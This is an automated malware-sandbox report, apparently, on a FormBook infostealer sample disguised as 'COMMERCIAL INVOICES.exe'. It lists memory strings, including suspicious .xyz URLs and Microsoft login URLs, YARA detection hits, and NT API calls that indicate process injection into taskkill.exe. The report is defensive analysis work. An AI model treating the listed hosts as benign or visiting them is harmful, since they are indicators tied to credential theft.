            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/3872200.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/4350950.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/4777950.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/5074320.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/6095900.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/6782600.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/711549.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/7115490.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/7115491.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/7115492.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/7517550.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/8042350.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/8767290.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/9237100.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/uploads/images/9638350.jpg
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/xiaoxiyou/
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/xiaozaochuanlianzi/
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/xidaoaili/
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/xiqijiexika/
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/yasendi/
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/yingmulin/
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/youtianzhenxi/
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/youyuanbumei/
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.5711337.xyz/zuozuomumingxib/
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000005716000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003256000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
            Source: taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: taskkill.exe, 00000006.00000002.3900061126.0000000006214000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.0000000003D54000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://c.mipcdn.com/static/v1/mip.css
            Source: taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: taskkill.exe, 00000006.00000002.3900061126.00000000058A8000.00000004.10000000.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899715494.00000000033E8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Nunito
            Source: taskkill.exe, 00000006.00000002.3897956616.0000000002B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: taskkill.exe, 00000006.00000002.3897956616.0000000002B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: taskkill.exe, 00000006.00000002.3897956616.0000000002B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
            Source: taskkill.exe, 00000006.00000002.3897956616.0000000002B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: taskkill.exe, 00000006.00000002.3897956616.0000000002B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033n
            Source: taskkill.exe, 00000006.00000002.3897956616.0000000002B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: taskkill.exe, 00000006.00000002.3897956616.0000000002B0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: taskkill.exe, 00000006.00000003.2720642580.0000000007EE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: COMMERCIAL INVOICES.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
            Source: taskkill.exe, 00000006.00000002.3902083897.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.COMMERCIAL INVOICES.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.COMMERCIAL INVOICES.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3899277856.00000000048F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2604198656.0000000005EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3898777340.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3899336059.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2545033489.0000000003F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3899241480.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 4.2.COMMERCIAL INVOICES.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 4.2.COMMERCIAL INVOICES.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3899277856.00000000048F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2604198656.0000000005EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3898777340.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3899336059.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.2545033489.0000000003F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3899241480.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: COMMERCIAL INVOICES.exe
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0042C2D3 NtClose,4_2_0042C2D3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282B60 NtClose,LdrInitializeThunk,4_2_01282B60
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01282DF0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01282C70
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012835C0 NtCreateMutant,LdrInitializeThunk,4_2_012835C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01284340 NtSetContextThread,4_2_01284340
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01284650 NtSuspendThread,4_2_01284650
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282BA0 NtEnumerateValueKey,4_2_01282BA0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282B80 NtQueryInformationFile,4_2_01282B80
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282BE0 NtQueryValueKey,4_2_01282BE0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282BF0 NtAllocateVirtualMemory,4_2_01282BF0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282AB0 NtWaitForSingleObject,4_2_01282AB0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282AF0 NtWriteFile,4_2_01282AF0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282AD0 NtReadFile,4_2_01282AD0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282D30 NtUnmapViewOfSection,4_2_01282D30
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282D00 NtSetInformationFile,4_2_01282D00
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282D10 NtMapViewOfSection,4_2_01282D10
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282DB0 NtEnumerateKey,4_2_01282DB0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282DD0 NtDelayExecution,4_2_01282DD0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282C00 NtQueryInformationProcess,4_2_01282C00
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282C60 NtCreateKey,4_2_01282C60
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282CA0 NtQueryInformationToken,4_2_01282CA0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282CF0 NtOpenProcess,4_2_01282CF0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282CC0 NtQueryVirtualMemory,4_2_01282CC0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282F30 NtCreateSection,4_2_01282F30
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282F60 NtCreateProcessEx,4_2_01282F60
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282FA0 NtQuerySection,4_2_01282FA0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282FB0 NtResumeThread,4_2_01282FB0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282F90 NtProtectVirtualMemory,4_2_01282F90
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282FE0 NtCreateFile,4_2_01282FE0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282E30 NtWriteVirtualMemory,4_2_01282E30
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282EA0 NtAdjustPrivilegesToken,4_2_01282EA0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282E80 NtReadVirtualMemory,4_2_01282E80
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01282EE0 NtQueueApcThread,4_2_01282EE0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01283010 NtOpenDirectoryObject,4_2_01283010
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01283090 NtSetValueKey,4_2_01283090
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012839B0 NtGetContextThread,4_2_012839B0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01283D10 NtOpenProcessToken,4_2_01283D10
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01283D70 NtOpenThread,4_2_01283D70
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE4650 NtSuspendThread,LdrInitializeThunk,6_2_04BE4650
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE4340 NtSetContextThread,LdrInitializeThunk,6_2_04BE4340
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04BE2CA0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04BE2C70
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2C60 NtCreateKey,LdrInitializeThunk,6_2_04BE2C60
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04BE2DF0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2DD0 NtDelayExecution,LdrInitializeThunk,6_2_04BE2DD0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04BE2D30
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04BE2D10
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04BE2EE0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2FB0 NtResumeThread,LdrInitializeThunk,6_2_04BE2FB0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2FE0 NtCreateFile,LdrInitializeThunk,6_2_04BE2FE0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2F30 NtCreateSection,LdrInitializeThunk,6_2_04BE2F30
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2AF0 NtWriteFile,LdrInitializeThunk,6_2_04BE2AF0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2AD0 NtReadFile,LdrInitializeThunk,6_2_04BE2AD0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2B60 NtClose,LdrInitializeThunk,6_2_04BE2B60
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE35C0 NtCreateMutant,LdrInitializeThunk,6_2_04BE35C0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE39B0 NtGetContextThread,LdrInitializeThunk,6_2_04BE39B0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2CF0 NtOpenProcess,6_2_04BE2CF0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2CC0 NtQueryVirtualMemory,6_2_04BE2CC0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2C00 NtQueryInformationProcess,6_2_04BE2C00
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2DB0 NtEnumerateKey,6_2_04BE2DB0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2D00 NtSetInformationFile,6_2_04BE2D00
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2EA0 NtAdjustPrivilegesToken,6_2_04BE2EA0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2E80 NtReadVirtualMemory,6_2_04BE2E80
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2E30 NtWriteVirtualMemory,6_2_04BE2E30
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2FA0 NtQuerySection,6_2_04BE2FA0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2F90 NtProtectVirtualMemory,6_2_04BE2F90
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2F60 NtCreateProcessEx,6_2_04BE2F60
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2AB0 NtWaitForSingleObject,6_2_04BE2AB0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2BA0 NtEnumerateValueKey,6_2_04BE2BA0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2B80 NtQueryInformationFile,6_2_04BE2B80
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2BF0 NtAllocateVirtualMemory,6_2_04BE2BF0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE2BE0 NtQueryValueKey,6_2_04BE2BE0
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE3090 NtSetValueKey,6_2_04BE3090
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE3010 NtOpenDirectoryObject,6_2_04BE3010
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE3D10 NtOpenProcessToken,6_2_04BE3D10
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_04BE3D70 NtOpenThread,6_2_04BE3D70
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_00878F10 NtCreateFile,6_2_00878F10
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_00879080 NtReadFile,6_2_00879080
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_00879170 NtDeleteFile,6_2_00879170
            Source: C:\Windows\SysWOW64\taskkill.exeCode function: 6_2_00879210 NtClose,6_2_00879210
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 0_2_02BAD5BC0_2_02BAD5BC
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 0_2_07135EB00_2_07135EB0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 0_2_071382600_2_07138260
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 0_2_07131F380_2_07131F38
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 0_2_07131F480_2_07131F48
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 0_2_071327B80_2_071327B8
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 0_2_071327A70_2_071327A7
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 0_2_07135EA00_2_07135EA0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 0_2_07130D700_2_07130D70
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 0_2_07133C200_2_07133C20
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 0_2_07131B100_2_07131B10
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 0_2_071323710_2_07132371
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 0_2_071323800_2_07132380
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 0_2_07131AC80_2_07131AC8
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_004182834_2_00418283
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_004010004_2_00401000
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0042E9234_2_0042E923
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0040FAE34_2_0040FAE3
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_004023604_2_00402360
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0041645F4_2_0041645F
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_004164634_2_00416463
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0040FD034_2_0040FD03
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0040DD834_2_0040DD83
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_00402E504_2_00402E50
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_004027504_2_00402750
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012401004_2_01240100
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012EA1184_2_012EA118
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D81584_2_012D8158
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_013041A24_2_013041A2
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_013101AA4_2_013101AA
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_013081CC4_2_013081CC
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012E20004_2_012E2000
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130A3524_2_0130A352
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0125E3F04_2_0125E3F0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_013103E64_2_013103E6
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F02744_2_012F0274
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D02C04_2_012D02C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012505354_2_01250535
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_013105914_2_01310591
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F44204_2_012F4420
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_013024464_2_01302446
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012FE4F64_2_012FE4F6
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012507704_2_01250770
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012747504_2_01274750
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124C7C04_2_0124C7C0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126C6E04_2_0126C6E0
